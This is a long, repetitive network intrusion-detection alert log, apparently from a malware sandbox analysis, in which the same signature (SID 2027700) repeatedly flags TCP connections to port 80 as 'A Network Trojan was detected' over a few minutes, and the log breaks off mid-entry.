                          Timestamp:192.168.2.662.204.41.449749802027700 02/07/23-20:00:58.376848
                          SID:2027700
                          Source Port:49749
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.449942802027700 02/07/23-20:01:53.287894
                          SID:2027700
                          Source Port:49942
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450463802027700 02/07/23-20:04:14.491803
                          SID:2027700
                          Source Port:50463
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.449847802027700 02/07/23-20:01:23.854308
                          SID:2027700
                          Source Port:49847
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.449844802027700 02/07/23-20:01:23.138925
                          SID:2027700
                          Source Port:49844
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.449761802027700 02/07/23-20:01:01.073822
                          SID:2027700
                          Source Port:49761
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450253802027700 02/07/23-20:03:20.519825
                          SID:2027700
                          Source Port:50253
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.449891802027700 02/07/23-20:01:37.097124
                          SID:2027700
                          Source Port:49891
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.449850802027700 02/07/23-20:01:24.592099
                          SID:2027700
                          Source Port:49850
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.449888802027700 02/07/23-20:01:36.353710
                          SID:2027700
                          Source Port:49888
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450069802027700 02/07/23-20:02:31.730232
                          SID:2027700
                          Source Port:50069
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.449799802027700 02/07/23-20:01:12.467161
                          SID:2027700
                          Source Port:49799
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.449758802027700 02/07/23-20:01:00.586842
                          SID:2027700
                          Source Port:49758
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450040802027700 02/07/23-20:02:20.818780
                          SID:2027700
                          Source Port:50040
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450170802027700 02/07/23-20:03:00.433375
                          SID:2027700
                          Source Port:50170
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450294802027700 02/07/23-20:03:33.100245
                          SID:2027700
                          Source Port:50294
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450212802027700 02/07/23-20:03:10.483511
                          SID:2027700
                          Source Port:50212
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450466802027700 02/07/23-20:04:15.238349
                          SID:2027700
                          Source Port:50466
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450164802027700 02/07/23-20:02:58.984888
                          SID:2027700
                          Source Port:50164
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450377802027700 02/07/23-20:03:53.490589
                          SID:2027700
                          Source Port:50377
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450123802027700 02/07/23-20:02:45.637795
                          SID:2027700
                          Source Port:50123
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450308802027700 02/07/23-20:03:36.533930
                          SID:2027700
                          Source Port:50308
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450336802027700 02/07/23-20:03:43.422466
                          SID:2027700
                          Source Port:50336
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450206802027700 02/07/23-20:03:08.986816
                          SID:2027700
                          Source Port:50206
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450438802027700 02/07/23-20:04:08.447686
                          SID:2027700
                          Source Port:50438
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.449819802027700 02/07/23-20:01:17.050746
                          SID:2027700
                          Source Port:49819
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.449920802027700 02/07/23-20:01:44.690559
                          SID:2027700
                          Source Port:49920
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.449831802027700 02/07/23-20:01:19.998060
                          SID:2027700
                          Source Port:49831
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450450802027700 02/07/23-20:04:11.381589
                          SID:2027700
                          Source Port:50450
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.449961802027700 02/07/23-20:01:57.956540
                          SID:2027700
                          Source Port:49961
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.449914802027700 02/07/23-20:01:42.801957
                          SID:2027700
                          Source Port:49914
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450116802027700 02/07/23-20:02:43.899561
                          SID:2027700
                          Source Port:50116
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450468802027700 02/07/23-20:04:15.743631
                          SID:2027700
                          Source Port:50468
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.449849802027700 02/07/23-20:01:24.342359
                          SID:2027700
                          Source Port:49849
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.449754802027700 02/07/23-20:00:59.616651
                          SID:2027700
                          Source Port:49754
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450407802027700 02/07/23-20:04:00.848990
                          SID:2027700
                          Source Port:50407
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.449950802027700 02/07/23-20:01:55.313521
                          SID:2027700
                          Source Port:49950
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450101802027700 02/07/23-20:02:40.156173
                          SID:2027700
                          Source Port:50101
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450257802027700 02/07/23-20:03:21.461331
                          SID:2027700
                          Source Port:50257
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450373802027700 02/07/23-20:03:52.533129
                          SID:2027700
                          Source Port:50373
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450021802027700 02/07/23-20:02:16.175026
                          SID:2027700
                          Source Port:50021
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450079802027700 02/07/23-20:02:34.128936
                          SID:2027700
                          Source Port:50079
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.449867802027700 02/07/23-20:01:31.342486
                          SID:2027700
                          Source Port:49867
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450195802027700 02/07/23-20:03:06.319605
                          SID:2027700
                          Source Port:50195
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.449904802027700 02/07/23-20:01:40.346551
                          SID:2027700
                          Source Port:49904
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450229802027700 02/07/23-20:03:14.593388
                          SID:2027700
                          Source Port:50229
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450391802027700 02/07/23-20:03:56.919310
                          SID:2027700
                          Source Port:50391
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.449782802027700 02/07/23-20:01:06.291221
                          SID:2027700
                          Source Port:49782
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450312802027700 02/07/23-20:03:37.521186
                          SID:2027700
                          Source Port:50312
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.449960802027700 02/07/23-20:01:57.722505
                          SID:2027700
                          Source Port:49960
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.449885802027700 02/07/23-20:01:35.593496
                          SID:2027700
                          Source Port:49885
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450330802027700 02/07/23-20:03:41.942562
                          SID:2027700
                          Source Port:50330
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.449983802027700 02/07/23-20:02:03.190207
                          SID:2027700
                          Source Port:49983
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450134802027700 02/07/23-20:02:51.667516
                          SID:2027700
                          Source Port:50134
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450190802027700 02/07/23-20:03:05.082669
                          SID:2027700
                          Source Port:50190
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450285802027700 02/07/23-20:03:30.859758
                          SID:2027700
                          Source Port:50285
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.449922802027700 02/07/23-20:01:45.348252
                          SID:2027700
                          Source Port:49922
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450126802027700 02/07/23-20:02:46.754869
                          SID:2027700
                          Source Port:50126
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.449726802027700 02/07/23-20:00:52.825969
                          SID:2027700
                          Source Port:49726
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.449839802027700 02/07/23-20:01:21.949196
                          SID:2027700
                          Source Port:49839
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450089802027700 02/07/23-20:02:37.027588
                          SID:2027700
                          Source Port:50089
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450167802027700 02/07/23-20:02:59.715669
                          SID:2027700
                          Source Port:50167
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450322802027700 02/07/23-20:03:39.988883
                          SID:2027700
                          Source Port:50322
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.449744802027700 02/07/23-20:00:57.142500
                          SID:2027700
                          Source Port:49744
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450363802027700 02/07/23-20:03:50.032689
                          SID:2027700
                          Source Port:50363
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450345802027700 02/07/23-20:03:45.626091
                          SID:2027700
                          Source Port:50345
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.449940802027700 02/07/23-20:01:52.794804
                          SID:2027700
                          Source Port:49940
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450304802027700 02/07/23-20:03:35.546383
                          SID:2027700
                          Source Port:50304
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450340802027700 02/07/23-20:03:44.394522
                          SID:2027700
                          Source Port:50340
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450185802027700 02/07/23-20:03:03.865291
                          SID:2027700
                          Source Port:50185
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.449721802027700 02/07/23-20:00:51.504071
                          SID:2027700
                          Source Port:49721
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450144802027700 02/07/23-20:02:54.112124
                          SID:2027700
                          Source Port:50144
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450476802027700 02/07/23-20:04:17.709098
                          SID:2027700
                          Source Port:50476
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450435802027700 02/07/23-20:04:07.721879
                          SID:2027700
                          Source Port:50435
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450239802027700 02/07/23-20:03:17.051311
                          SID:2027700
                          Source Port:50239
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450180802027700 02/07/23-20:03:02.871686
                          SID:2027700
                          Source Port:50180
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.449792802027700 02/07/23-20:01:10.777922
                          SID:2027700
                          Source Port:49792
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450381802027700 02/07/23-20:03:54.458167
                          SID:2027700
                          Source Port:50381
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.449816802027700 02/07/23-20:01:16.328216
                          SID:2027700
                          Source Port:49816
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.449970802027700 02/07/23-20:02:00.209993
                          SID:2027700
                          Source Port:49970
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450458802027700 02/07/23-20:04:13.302774
                          SID:2027700
                          Source Port:50458
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.449857802027700 02/07/23-20:01:28.881945
                          SID:2027700
                          Source Port:49857
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450162802027700 02/07/23-20:02:58.501955
                          SID:2027700
                          Source Port:50162
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450417802027700 02/07/23-20:04:03.329321
                          SID:2027700
                          Source Port:50417
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450335802027700 02/07/23-20:03:43.169376
                          SID:2027700
                          Source Port:50335
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.449973802027700 02/07/23-20:02:00.704664
                          SID:2027700
                          Source Port:49973
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450298802027700 02/07/23-20:03:34.067174
                          SID:2027700
                          Source Port:50298
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450295802027700 02/07/23-20:03:33.354558
                          SID:2027700
                          Source Port:50295
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450038802027700 02/07/23-20:02:20.336644
                          SID:2027700
                          Source Port:50038
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450154802027700 02/07/23-20:02:56.574090
                          SID:2027700
                          Source Port:50154
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.449887802027700 02/07/23-20:01:36.097176
                          SID:2027700
                          Source Port:49887
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.449762802027700 02/07/23-20:01:01.308698
                          SID:2027700
                          Source Port:49762
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450090802027700 02/07/23-20:02:37.310665
                          SID:2027700
                          Source Port:50090
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450332802027700 02/07/23-20:03:42.434857
                          SID:2027700
                          Source Port:50332
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.449930802027700 02/07/23-20:01:50.374173
                          SID:2027700
                          Source Port:49930
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450267802027700 02/07/23-20:03:26.438067
                          SID:2027700
                          Source Port:50267
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450409802027700 02/07/23-20:04:01.334892
                          SID:2027700
                          Source Port:50409
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450448802027700 02/07/23-20:04:10.888532
                          SID:2027700
                          Source Port:50448
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.449826802027700 02/07/23-20:01:18.795280
                          SID:2027700
                          Source Port:49826
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.449945802027700 02/07/23-20:01:54.040738
                          SID:2027700
                          Source Port:49945
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450157802027700 02/07/23-20:02:57.285145
                          SID:2027700
                          Source Port:50157
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.449752802027700 02/07/23-20:00:59.119449
                          SID:2027700
                          Source Port:49752
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450111802027700 02/07/23-20:02:42.651134
                          SID:2027700
                          Source Port:50111
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450371802027700 02/07/23-20:03:52.056353
                          SID:2027700
                          Source Port:50371
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.449829802027700 02/07/23-20:01:19.514063
                          SID:2027700
                          Source Port:49829
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450445802027700 02/07/23-20:04:10.137178
                          SID:2027700
                          Source Port:50445
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450259802027700 02/07/23-20:03:22.267663
                          SID:2027700
                          Source Port:50259
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450478802027700 02/07/23-20:04:18.186763
                          SID:2027700
                          Source Port:50478
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.449790802027700 02/07/23-20:01:10.237146
                          SID:2027700
                          Source Port:49790
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450129802027700 02/07/23-20:02:48.528501
                          SID:2027700
                          Source Port:50129
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450152802027700 02/07/23-20:02:56.096465
                          SID:2027700
                          Source Port:50152
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450193802027700 02/07/23-20:03:05.833351
                          SID:2027700
                          Source Port:50193
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.449741802027700 02/07/23-20:00:56.423673
                          SID:2027700
                          Source Port:49741
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450437802027700 02/07/23-20:04:08.206570
                          SID:2027700
                          Source Port:50437
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.449818802027700 02/07/23-20:01:16.810089
                          SID:2027700
                          Source Port:49818
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.449902802027700 02/07/23-20:01:39.857998
                          SID:2027700
                          Source Port:49902
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450011802027700 02/07/23-20:02:13.661822
                          SID:2027700
                          Source Port:50011
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.449859802027700 02/07/23-20:01:29.375750
                          SID:2027700
                          Source Port:49859
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450230802027700 02/07/23-20:03:14.875718
                          SID:2027700
                          Source Port:50230
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450360802027700 02/07/23-20:03:49.278758
                          SID:2027700
                          Source Port:50360
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.449724802027700 02/07/23-20:00:52.311391
                          SID:2027700
                          Source Port:49724
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450052802027700 02/07/23-20:02:23.740043
                          SID:2027700
                          Source Port:50052
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450343802027700 02/07/23-20:03:45.134037
                          SID:2027700
                          Source Port:50343
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450182802027700 02/07/23-20:03:03.137173
                          SID:2027700
                          Source Port:50182
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.449795802027700 02/07/23-20:01:11.503277
                          SID:2027700
                          Source Port:49795
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450124802027700 02/07/23-20:02:45.914007
                          SID:2027700
                          Source Port:50124
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.449854802027700 02/07/23-20:01:26.635794
                          SID:2027700
                          Source Port:49854
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450307802027700 02/07/23-20:03:36.268284
                          SID:2027700
                          Source Port:50307
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.449895802027700 02/07/23-20:01:38.089700
                          SID:2027700
                          Source Port:49895
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.449932802027700 02/07/23-20:01:50.862632
                          SID:2027700
                          Source Port:49932
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450302802027700 02/07/23-20:03:35.050150
                          SID:2027700
                          Source Port:50302
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450473802027700 02/07/23-20:04:16.958101
                          SID:2027700
                          Source Port:50473
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.449846802027700 02/07/23-20:01:23.606581
                          SID:2027700
                          Source Port:49846
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450465802027700 02/07/23-20:04:14.989652
                          SID:2027700
                          Source Port:50465
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450070802027700 02/07/23-20:02:31.982508
                          SID:2027700
                          Source Port:50070
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.449935802027700 02/07/23-20:01:51.579500
                          SID:2027700
                          Source Port:49935
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450076802027700 02/07/23-20:02:33.409323
                          SID:2027700
                          Source Port:50076
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450165802027700 02/07/23-20:02:59.233846
                          SID:2027700
                          Source Port:50165
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450376802027700 02/07/23-20:03:53.252674
                          SID:2027700
                          Source Port:50376
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.449892802027700 02/07/23-20:01:37.344208
                          SID:2027700
                          Source Port:49892
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.449953802027700 02/07/23-20:01:56.032155
                          SID:2027700
                          Source Port:49953
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.449757802027700 02/07/23-20:01:00.338641
                          SID:2027700
                          Source Port:49757
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.449981802027700 02/07/23-20:02:02.719021
                          SID:2027700
                          Source Port:49981
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450137802027700 02/07/23-20:02:52.411572
                          SID:2027700
                          Source Port:50137
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450131802027700 02/07/23-20:02:50.831579
                          SID:2027700
                          Source Port:50131
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.449864802027700 02/07/23-20:01:30.634611
                          SID:2027700
                          Source Port:49864
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.449907802027700 02/07/23-20:01:41.092787
                          SID:2027700
                          Source Port:49907
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450042802027700 02/07/23-20:02:21.298484
                          SID:2027700
                          Source Port:50042
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450198802027700 02/07/23-20:03:07.083063
                          SID:2027700
                          Source Port:50198
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450048802027700 02/07/23-20:02:22.753627
                          SID:2027700
                          Source Port:50048
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.449775802027700 02/07/23-20:01:04.516285
                          SID:2027700
                          Source Port:49775
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450287802027700 02/07/23-20:03:31.342737
                          SID:2027700
